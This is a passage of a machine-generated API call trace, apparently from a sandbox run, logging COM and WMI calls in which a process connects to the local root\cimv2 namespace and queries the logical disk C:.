riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0196.882] WbemDefPath:IUnknown:AddRef (This=0x6029c70) returned 0x3 [0196.882] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0196.882] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0196.882] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0x66ccd98) returned 0x0 [0196.882] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccd98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.882] WbemDefPath:IUnknown:Release (This=0x66ccd98) returned 0x3 [0196.882] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0196.882] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0196.882] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0196.882] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x2 [0196.882] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x1 [0196.882] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0196.882] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0196.882] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x6029c70) returned 0x0 [0196.882] WbemDefPath:IUnknown:AddRef (This=0x6029c70) returned 0x3 [0196.883] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x2 [0196.883] WbemDefPath:IWbemPath:SetText (This=0x6029c70, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029c70, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029c70, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029c70, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029c70, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029c70, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029c70, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0196.883] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.883] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0196.883] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0196.883] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0196.883] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.884] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x60271b0) returned 0x0 [0196.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0196.884] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x6029ce0) returned 0x0 [0196.884] WbemDefPath:IUnknown:Release (This=0x60271b0) returned 0x0 [0196.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x6029ce0) returned 0x0 [0196.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0196.884] WbemDefPath:IUnknown:AddRef (This=0x6029ce0) returned 0x3 [0196.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0196.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0196.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0x66ccc58) returned 0x0 [0196.884] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc58, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.884] WbemDefPath:IUnknown:Release (This=0x66ccc58) returned 0x3 [0196.884] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0196.884] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0196.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0196.884] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x2 [0196.884] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x1 [0196.884] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0196.884] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0196.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x6029ce0) returned 0x0 [0196.885] WbemDefPath:IUnknown:AddRef (This=0x6029ce0) returned 0x3 [0196.885] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x2 [0196.885] WbemDefPath:IWbemPath:SetText (This=0x6029ce0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0196.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0196.885] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0196.885] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.885] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0196.885] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0196.885] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0196.885] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.885] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x60249e0) returned 0x0 [0196.885] WbemLocator:IUnknown:QueryInterface (in: This=0x60249e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0196.886] WbemLocator:IClassFactory:CreateInstance (in: This=0x60249e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x60271c0) returned 0x0 [0196.886] WbemLocator:IUnknown:Release (This=0x60249e0) returned 0x0 [0196.886] WbemLocator:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x60271c0) returned 0x0 [0196.886] WbemLocator:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0196.886] WbemLocator:IUnknown:AddRef (This=0x60271c0) returned 0x3 [0196.886] WbemLocator:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0196.886] WbemLocator:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0196.886] WbemLocator:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0196.886] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0196.886] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0196.886] WbemLocator:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0196.886] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x2 [0196.886] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x1 [0196.886] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0196.886] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0196.886] WbemLocator:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x60271c0) returned 0x0 [0196.886] WbemLocator:IUnknown:AddRef (This=0x60271c0) returned 0x3 [0196.886] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x2 [0196.886] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0196.886] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0196.886] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.886] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x60271d0) returned 0x0 [0196.886] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271d0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x603368c) returned 0x0 [0197.523] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5bd64) returned 0x0 [0197.523] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bd64, pProxy=0x603368c, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0197.523] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x1 [0197.523] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5bd84) returned 0x0 [0197.523] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5bd64) returned 0x0 [0197.524] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bd64, pProxy=0x603368c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0197.524] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x2 [0197.524] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0197.524] CoTaskMemFree (pv=0xbd4a68) [0197.524] WbemLocator:IUnknown:Release (This=0x60271d0) returned 0x0 [0197.524] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5bd84) returned 0x0 [0197.524] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0197.525] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0197.525] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0197.525] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0197.526] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0197.526] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5bce4) returned 0x0 [0197.526] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.526] WbemLocator:IUnknown:Release (This=0xb5bce4) returned 0x3 [0197.526] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0197.527] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0197.527] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5bd6c) returned 0x0 [0197.527] WbemLocator:IRpcOptions:Query (in: This=0xb5bd6c, pPrx=0xb5bd84, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0197.527] WbemLocator:IUnknown:Release (This=0xb5bd6c) returned 0x3 [0197.527] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0197.527] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0197.527] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0197.527] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x603368c) returned 0x0 [0197.527] WbemLocator:IUnknown:AddRef (This=0x603368c) returned 0x4 [0197.527] WbemLocator:IUnknown:Release (This=0x603368c) returned 0x3 [0197.527] WbemLocator:IUnknown:Release (This=0x603368c) returned 0x2 [0197.527] SysStringLen (param_1=0x0) returned 0x0 [0197.527] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029c70, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0197.527] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0197.527] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.527] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0197.527] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0197.527] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5bd84) returned 0x0 [0197.528] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x3 [0197.528] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0197.528] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0197.528] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: 